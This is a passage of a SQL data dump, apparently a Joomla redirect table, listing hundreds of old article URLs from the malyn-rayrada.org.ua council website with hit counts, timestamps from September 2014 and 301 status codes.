00:00:00',301),(640,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=908:2013-01-21-08-58-40&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',3,0,'2014-09-16 18:22:31','0000-00-00 00:00:00',301),(641,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1234:2014-03-04-09-59-46&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',7,0,'2014-09-16 18:22:36','0000-00-00 00:00:00',301),(642,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1347:2014-06-19-11-19-16&catid=11&Itemid=14&lang=uk','','','',17,0,'2014-09-16 18:23:27','0000-00-00 00:00:00',301),(643,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1022:-lr-&catid=51&Itemid=92&lang=uk','','','',14,0,'2014-09-16 18:23:55','0000-00-00 00:00:00',301),(644,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&catid=11&lang=en','','','',3,0,'2014-09-16 18:25:15','0000-00-00 00:00:00',301),(645,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1102:2013-10-03-08-08-33&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',14,0,'2014-09-16 18:25:53','0000-00-00 00:00:00',301),(646,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1172:2014-01-14-14-46-07&catid=11&Itemid=14&lang=uk','','','',12,0,'2014-09-16 18:28:05','0000-00-00 00:00:00',301),(647,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1224:----25--2014-&catid=11&Itemid=14&lang=ru','','','',17,0,'2014-09-16 18:30:29','0000-00-00 00:00:00',301),(648,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1274:-l-r&catid=57:--15042014-&Itemid=98&lang=ru','','','',33,0,'2014-09-16 18:31:23','0000-00-00 00:00:00',301),(649,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=944:-l-r-&catid=49:--12042013-&Itemid=88&lang=uk','','','',18,0,'2014-09-16 18:31:33','0000-00-00 00:00:00',301),(650,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1202:2014-01-31-07-45-54&catid=56:--03022014-&Itemid=97&lang=uk','','','',13,0,'2014-09-16 18:31:50','0000-00-00 00:00:00',301),(651,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1155:2013-12-07-15-56-12&catid=11&Itemid=14&lang=ru','','','',6,0,'2014-09-16 18:32:07','0000-00-00 00:00:00',301),(652,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1071:2013-08-27-14-06-18&catid=11&Itemid=14&lang=uk','','','',20,0,'2014-09-16 18:32:31','0000-00-00 00:00:00',301),(653,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1070:2013-08-23-04-27-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',8,0,'2014-09-16 18:32:47','0000-00-00 00:00:00',301),(654,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:-24-6-&catid=11&Itemid=14&lang=ru','','','',9,0,'2014-09-16 18:33:51','0000-00-00 00:00:00',301),(655,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1039:-l-r&catid=51:--19072013-&Itemid=92&lang=uk','','','',17,0,'2014-09-16 18:33:54','0000-00-00 00:00:00',301),(656,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1112:2013-10-23-09-24-43&catid=53&Itemid=94&lang=ru','','','',15,0,'2014-09-16 18:33:57','0000-00-00 00:00:00',301),(657,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=875:-2013-&catid=47:-21022013-&Itemid=86&lang=uk','','','',7,0,'2014-09-16 18:34:42','0000-00-00 00:00:00',301),(658,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1204:2014-01-31-07-51-23&catid=56:--03022014-&Itemid=97&lang=ru','','','',24,0,'2014-09-16 18:34:57','0000-00-00 00:00:00',301),(659,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1032:-l-r-2012-2015-&catid=51:--19072013-&Itemid=92&lang=ru','','','',7,0,'2014-09-16 18:35:55','0000-00-00 00:00:00',301),(660,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1089:-l-r-&catid=53:--25102013-&Itemid=94&lang=en','','','',7,0,'2014-09-16 18:37:05','0000-00-00 00:00:00',301),(661,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1240:2014-03-17-07-01-32&catid=36&Itemid=70&lang=en','','','',9,0,'2014-09-16 18:37:47','0000-00-00 00:00:00',301),(662,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1368:2014-07-17-04-39-11&catid=11&Itemid=14&lang=uk','','','',7,0,'2014-09-16 18:37:51','0000-00-00 00:00:00',301),(663,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=897:2013-01-18-07-40-55&catid=36&Itemid=70&lang=uk','','','',16,0,'2014-09-16 18:38:26','0000-00-00 00:00:00',301),(664,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=911:2013-01-22-13-27-41&catid=11&Itemid=14&lang=en','','','',8,0,'2014-09-16 18:39:01','0000-00-00 00:00:00',301),(665,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1286:2014-04-23-06-48-27&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',31,0,'2014-09-16 18:41:39','0000-00-00 00:00:00',301),(666,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1032:-l-r-2012-2015-&catid=51&Itemid=92&lang=uk','','','',9,0,'2014-09-16 18:41:46','0000-00-00 00:00:00',301),(667,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1320:--------15--2010---12-l----r&catid=36&Itemid=70&lang=uk','','','',8,0,'2014-09-16 18:42:09','0000-00-00 00:00:00',301),(668,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=947:-lr-2012-2015-&catid=36&Itemid=70&lang=ru','','','',6,0,'2014-09-16 18:42:41','0000-00-00 00:00:00',301),(669,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1089:--------l---r---&catid=36&Itemid=70&lang=uk','','','',8,0,'2014-09-16 18:49:29','0000-00-00 00:00:00',301),(670,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=937:---------------------------21122012--l--&catid=47&Itemid=86&lang=en','','','',11,0,'2014-09-16 18:49:59','0000-00-00 00:00:00',301),(671,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1365:2014-07-10-13-58-58&catid=11&Itemid=14&lang=uk','','','',20,0,'2014-09-16 18:51:31','0000-00-00 00:00:00',301),(672,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=944:-l-r-&catid=49&Itemid=88&lang=uk','','','',15,0,'2014-09-16 18:52:49','0000-00-00 00:00:00',301),(673,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1116:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',19,0,'2014-09-16 18:56:55','0000-00-00 00:00:00',301),(674,'http://www.malyn-rayrada.org.ua/index.php/component/phocagallery/?view=categories','','http://www.malyn-rayrada.org.ua/index.php/2010-06-06-05-22-15/27-galereja_2','',2,0,'2014-09-16 19:00:20','0000-00-00 00:00:00',301),(675,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1042:-qq-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',12,0,'2014-09-16 19:03:36','0000-00-00 00:00:00',301),(676,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=885:-2013-2015-&catid=46:--21122012&Itemid=85&lang=uk','','','',30,0,'2014-09-16 19:03:49','0000-00-00 00:00:00',301),(677,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=943:-qq&catid=11&lang=uk','','','',4,0,'2014-09-16 19:04:24','0000-00-00 00:00:00',301),(678,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1027:-2013-2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',8,0,'2014-09-16 19:12:06','0000-00-00 00:00:00',301),(679,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1039:---------------l-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',14,0,'2014-09-16 19:13:55','0000-00-00 00:00:00',301),(680,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1061:2013-07-29-08-58-16&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',7,0,'2014-09-16 19:14:55','0000-00-00 00:00:00',301),(681,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&catid=11&lang=uk','','','',9,0,'2014-09-16 19:16:42','0000-00-00 00:00:00',301),(682,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=869:2012-12-16-16-05-45&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',12,0,'2014-09-16 19:18:26','0000-00-00 00:00:00',301),(683,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1375:-33-6-&catid=11&Itemid=14&lang=en','','','',15,0,'2014-09-16 19:20:18','0000-00-00 00:00:00',301),(684,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=853:2012-12-11-13-39-46&catid=32:2011-03-31-12-03-04&Itemid=64&lang=uk','','','',13,0,'2014-09-16 19:20:25','0000-00-00 00:00:00',301),(685,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=867:2012-12-14-10-13-30&catid=46&Itemid=85&lang=ru','','','',9,0,'2014-09-16 19:20:58','0000-00-00 00:00:00',301),(686,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1352:2014-06-26-06-51-20&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-09-16 19:21:58','0000-00-00 00:00:00',301),(687,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=895:-2013-2017-&catid=47:-21022013-&Itemid=86&lang=uk','','','',8,0,'2014-09-16 19:26:16','0000-00-00 00:00:00',301),(688,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1178:2014-01-21-12-39-34&catid=11&Itemid=14&lang=en','','','',11,0,'2014-09-16 19:27:19','0000-00-00 00:00:00',301),(689,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1162:2013-12-19-06-13-29&catid=11&Itemid=14&lang=en','','','',10,0,'2014-09-16 19:27:44','0000-00-00 00:00:00',301),(690,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1033:2013-06-18-12-58-36&catid=51:--19072013-&Itemid=92&lang=ru','','','',12,0,'2014-09-16 19:28:04','0000-00-00 00:00:00',301),(691,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1088:2013-09-19-12-06-07&catid=53&Itemid=94&lang=uk','','','',7,0,'2014-09-16 19:28:38','0000-00-00 00:00:00',301),(692,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1184:----27----6-&catid=11&Itemid=14&lang=ru','','','',20,0,'2014-09-16 19:28:45','0000-00-00 00:00:00',301),(693,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1321:------------------lr-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',8,0,'2014-09-16 19:29:21','0000-00-00 00:00:00',301),(694,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1097:2013-09-25-08-35-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',9,0,'2014-09-16 19:29:46','0000-00-00 00:00:00',301),(695,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=categories&lang=uk','','','',26,0,'2014-09-16 19:31:56','0000-00-00 00:00:00',301),(696,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1328:2014-06-01-11-58-56&catid=11&Itemid=14&lang=uk','','','',14,0,'2014-09-16 19:33:25','0000-00-00 00:00:00',301),(697,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1250:2014-03-24-07-04-57&catid=11&lang=en&Itemid=0','','','',22,0,'2014-09-16 19:34:19','0000-00-00 00:00:00',301),(698,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1111:2013-10-22-16-06-36&catid=11&Itemid=14&lang=uk','','','',16,0,'2014-09-16 19:35:29','0000-00-00 00:00:00',301),(699,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=861:-qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=ru','','','',4,0,'2014-09-16 19:35:40','0000-00-00 00:00:00',301),(700,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1313:2014-05-14-10-00-55&catid=11&lang=en&Itemid=','','','',9,0,'2014-09-16 19:36:50','0000-00-00 00:00:00',301),(701,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1151:2013-11-28-14-54-33&catid=54:--29112013-&Itemid=95&lang=en','','','',36,0,'2014-09-16 19:37:15','0000-00-00 00:00:00',301),(702,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1236:2014-03-07-06-36-44&catid=11&Itemid=14&lang=en','','','',10,0,'2014-09-16 19:38:24','0000-00-00 00:00:00',301),(703,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1334:2014-06-06-05-54-20&catid=11&Itemid=14&lang=en','','','',14,0,'2014-09-16 19:38:43','0000-00-00 00:00:00',301),(704,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1071:2013-08-27-14-06-18&catid=11&lang=en','','','',5,0,'2014-09-16 19:39:35','0000-00-00 00:00:00',301),(705,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1132:2013-11-13-10-02-24&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',14,0,'2014-09-16 19:40:39','0000-00-00 00:00:00',301),(706,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=983:2013-04-04-11-23-57&catid=49&Itemid=88&lang=uk','','','',8,0,'2014-09-16 19:42:16','0000-00-00 00:00:00',301),(707,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=983:2013-04-04-11-23-57&catid=49:--12042013-&Itemid=88&lang=uk','','','',19,0,'2014-09-16 19:45:27','0000-00-00 00:00:00',301),(708,'http://www.malyn-rayrada.org.ua/index.php?option=com_poll&id=10:2013-02-22-07-29-10&lang=en&Itemid=0','','','',5,0,'2014-09-16 19:46:15','0000-00-00 00:00:00',301),(709,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=938:---------------6612-------626-&catid=47&Itemid=86&lang=en','','','',20,0,'2014-09-16 19:47:11','0000-00-00 00:00:00',301),(710,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=categories&lang=en','','','',15,0,'2014-09-16 19:48:36','0000-00-00 00:00:00',301),(711,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&catid=11&Itemid=14&lang=en','','','',33,0,'2014-09-16 19:48:37','0000-00-00 00:00:00',301),(712,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1322:-2012-2015-&catid=59&Itemid=107&lang=en','','','',7,0,'2014-09-16 19:49:20','0000-00-00 00:00:00',301),(713,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1049:2013-07-15-05-50-46&catid=11&lang=en&Itemid=0','','','',9,0,'2014-09-16 19:49:23','0000-00-00 00:00:00',301),(714,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1355:2014-07-02-06-11-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',19,0,'2014-09-16 19:50:24','0000-00-00 00:00:00',301),(715,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1188:2014-01-28-09-45-21&catid=56&Itemid=97&lang=uk','','','',15,0,'2014-09-16 19:50:43','0000-00-00 00:00:00',301),(716,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',33,0,'2014-09-16 19:52:41','0000-00-00 00:00:00',301),(717,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1355:2014-07-02-06-11-04&catid=11&Itemid=14&lang=ru','','','',17,0,'2014-09-16 19:55:27','0000-00-00 00:00:00',301),(718,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=907:2013-01-21-08-54-59&catid=47&Itemid=86&lang=uk','','','',13,0,'2014-09-16 19:56:35','0000-00-00 00:00:00',301),(719,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1209:-----2014-&catid=11&Itemid=14&lang=ru','','','',32,0,'2014-09-16 19:57:36','0000-00-00 00:00:00',301),(720,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1225:2014-02-24-13-27-21&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',12,0,'2014-09-16 19:57:47','0000-00-00 00:00:00',301),(721,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1373:2014-08-07-11-39-57&catid=11&Itemid=14&lang=uk','','','',26,0,'2014-09-16 19:58:02','0000-00-00 00:00:00',301),(722,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1354:-lr-&catid=11&Itemid=14&lang=ru','','','',11,0,'2014-09-16 20:01:44','0000-00-00 00:00:00',301),(723,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1068:-22-&catid=15&lang=en&Itemid=0','','','',4,0,'2014-09-16 20:02:24','0000-00-00 00:00:00',301),(724,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1182:2014-01-23-06-45-09&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',11,0,'2014-09-16 20:04:19','0000-00-00 00:00:00',301),(725,'http://www.malyn-rayrada.org.ua/index.php/853-gromadska-organizacija-malinshhina-povidomljae-pro','','','',2,0,'2014-09-16 20:05:23','0000-00-00 00:00:00',301),(726,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1347:2014-06-19-11-19-16&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',23,0,'2014-09-16 20:10:40','0000-00-00 00:00:00',301),(727,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1366:-2014-&catid=60:--11072014-&Itemid=108&lang=ru','','','',13,0,'2014-09-16 20:12:50','0000-00-00 00:00:00',301),(728,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',14,0,'2014-09-16 20:12:56','0000-00-00 00:00:00',301),(729,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=944:-l-r-&catid=49&Itemid=88&lang=ru','','','',13,0,'2014-09-16 20:13:00','0000-00-00 00:00:00',301),(730,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1103:2013-10-03-09-29-30&catid=11&Itemid=14&lang=ru','','','',9,0,'2014-09-16 20:13:27','0000-00-00 00:00:00',301),(731,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=885:-2013-2015-&catid=46&Itemid=85&lang=uk','','','',5,0,'2014-09-16 20:15:05','0000-00-00 00:00:00',301),(732,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1032:-l-r-2012-2015-&catid=51:--19072013-&Itemid=92&lang=uk','','','',18,0,'2014-09-16 20:15:32','0000-00-00 00:00:00',301),(733,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',43,0,'2014-09-16 20:15:52','0000-00-00 00:00:00',301),(734,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1115:----24----&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-09-16 20:16:05','0000-00-00 00:00:00',301),(735,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1242:------25--2011--74---19--2011---193-&catid=36&Itemid=70&lang=ru','','','',10,0,'2014-09-16 20:16:44','0000-00-00 00:00:00',301),(736,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1151:2013-11-28-14-54-33&catid=54:--29112013-&Itemid=95&lang=uk','','','',20,0,'2014-09-16 20:16:58','0000-00-00 00:00:00',301),(737,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=933:-2013-2017-&catid=47&Itemid=86&lang=ru','','','',16,0,'2014-09-16 20:18:08','0000-00-00 00:00:00',301),(738,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1170:2014-01-08-11-02-06&catid=11&Itemid=14&lang=uk','','','',14,0,'2014-09-16 20:18:10','0000-00-00 00:00:00',301),(739,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1211:-2014-&catid=56:--03022014-&Itemid=97&lang=en','','','',13,0,'2014-09-16 20:18:57','0000-00-00 00:00:00',301),(740,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1272:2014-04-09-05-15-36&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',19,0,'2014-09-16 20:19:40','0000-00-00 00:00:00',301),(741,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=983:2013-04-04-11-23-57&catid=49:--12042013-&Itemid=88&lang=ru','','','',8,0,'2014-09-16 20:20:11','0000-00-00 00:00:00',301),(742,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1147:2013-11-28-09-57-12&catid=11&Itemid=14&lang=en','','','',9,0,'2014-09-16 20:20:49','0000-00-00 00:00:00',301),(743,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1352:2014-06-26-06-51-20&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',34,0,'2014-09-16 20:21:53','0000-00-00 00:00:00',301),(744,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1339:2014-06-12-09-22-34&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',8,0,'2014-09-16 20:22:02','0000-00-00 00:00:00',301),(745,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=7&Itemid=12&lang=en','','','',28,0,'2014-09-16 20:22:56','0000-00-00 00:00:00',301),(746,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1056:-22-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',10,0,'2014-09-16 20:23:24','0000-00-00 00:00:00',301),(747,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',13,0,'2014-09-16 20:24:05','0000-00-00 00:00:00',301),(748,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=992:-3-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-09-16 20:24:12','0000-00-00 00:00:00',301),(749,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=962:-2017-&catid=49&Itemid=88&lang=ru','','','',12,0,'2014-09-16 20:25:05','0000-00-00 00:00:00',301),(750,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1184:----27----6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',10,0,'2014-09-16 20:25:09','0000-00-00 00:00:00',301),(751,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1019:2013-06-06-11-26-38&catid=51&Itemid=92&lang=en','','','',15,0,'2014-09-16 20:25:22','0000-00-00 00:00:00',301),(752,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=947:-lr-2012-2015-&catid=49&Itemid=88&lang=ru','','','',6,0,'2014-09-16 20:25:58','0000-00-00 00:00:00',301),(753,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1303:2014-04-29-13-13-18&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',17,0,'2014-09-16 20:27:35','0000-00-00 00:00:00',301),(754,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1035:2013-06-25-09-55-31&catid=11&lang=uk&Itemid=','','','',7,0,'2014-09-16 20:27:37','0000-00-00 00:00:00',301),(755,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=941:2013-02-27-14-30-15&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',9,0,'2014-09-16 20:29:00','0000-00-00 00:00:00',301),(756,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1291:2014-04-23-11-37-34&catid=11&Itemid=14&lang=uk','','','',21,0,'2014-09-16 20:29:22','0000-00-00 00:00:00',301),(757,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1184:----27----6-&catid=11&Itemid=14&lang=en','','','',16,0,'2014-09-16 20:30:06','0000-00-00 00:00:00',301),(758,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1301:-28-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',15,0,'2014-09-16 20:30:25','0000-00-00 00:00:00',301),(759,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1071:2013-08-27-14-06-18&catid=11&Itemid=14&lang=en','','','',13,0,'2014-09-16 20:30:30','0000-00-00 00:00:00',301),(760,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1169:2014-01-08-07-30-47&catid=55:--26122013-&Itemid=96&lang=uk','','','',19,0,'2014-09-16 20:31:12','0000-00-00 00:00:00',301),(761,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1021:---l---r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',10,0,'2014-09-16 20:34:52','0000-00-00 00:00:00',301),(762,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1070:2013-08-23-04-27-00&catid=11&Itemid=14&lang=uk','','','',18,0,'2014-09-16 20:38:59','0000-00-00 00:00:00',301),(763,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1027:-2013-2013-&catid=51:--19072013-&Itemid=92&lang=ru','','','',12,0,'2014-09-16 20:41:45','0000-00-00 00:00:00',301),(764,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1031:2013-06-17-06-49-26&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',9,0,'2014-09-16 20:42:46','0000-00-00 00:00:00',301),(765,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1141:2013-11-26-13-18-12&catid=54&Itemid=95&lang=uk','','','',10,0,'2014-09-16 20:43:11','0000-00-00 00:00:00',301),(766,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1285:2014-04-17-16-55-05&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',14,0,'2014-09-16 20:44:55','0000-00-00 00:00:00',301),(767,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1078:-2007-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',16,0,'2014-09-16 20:48:21','0000-00-00 00:00:00',301),(768,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1278:2014-04-11-13-44-30&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',47,0,'2014-09-16 20:53:22','0000-00-00 00:00:00',301),(769,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=996:2013-04-25-12-09-57&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',20,0,'2014-09-16 20:54:19','0000-00-00 00:00:00',301),(770,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1071:2013-08-27-14-06-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',7,0,'2014-09-16 20:58:58','0000-00-00 00:00:00',301),(771,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1313:2014-05-14-10-00-55&catid=11&Itemid=14&lang=en','','','',19,0,'2014-09-16 20:59:42','0000-00-00 00:00:00',301),(772,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1367:-lr-&catid=11&Itemid=14&lang=en','','','',13,0,'2014-09-16 21:01:06','0000-00-00 00:00:00',301),(773,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=948:-2012-&catid=49:--12042013-&Itemid=88&lang=uk','','','',12,0,'2014-09-16 21:09:11','0000-00-00 00:00:00',301),(774,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1081:-2013-2017-&catid=53:--25102013-&Itemid=94&lang=uk','','','',9,0,'2014-09-16 21:23:58','0000-00-00 00:00:00',301),(775,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1033:2013-06-18-12-58-36&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',8,0,'2014-09-16 21:24:01','0000-00-00 00:00:00',301),(776,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1093:------------2017-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',9,0,'2014-09-16 21:24:05','0000-00-00 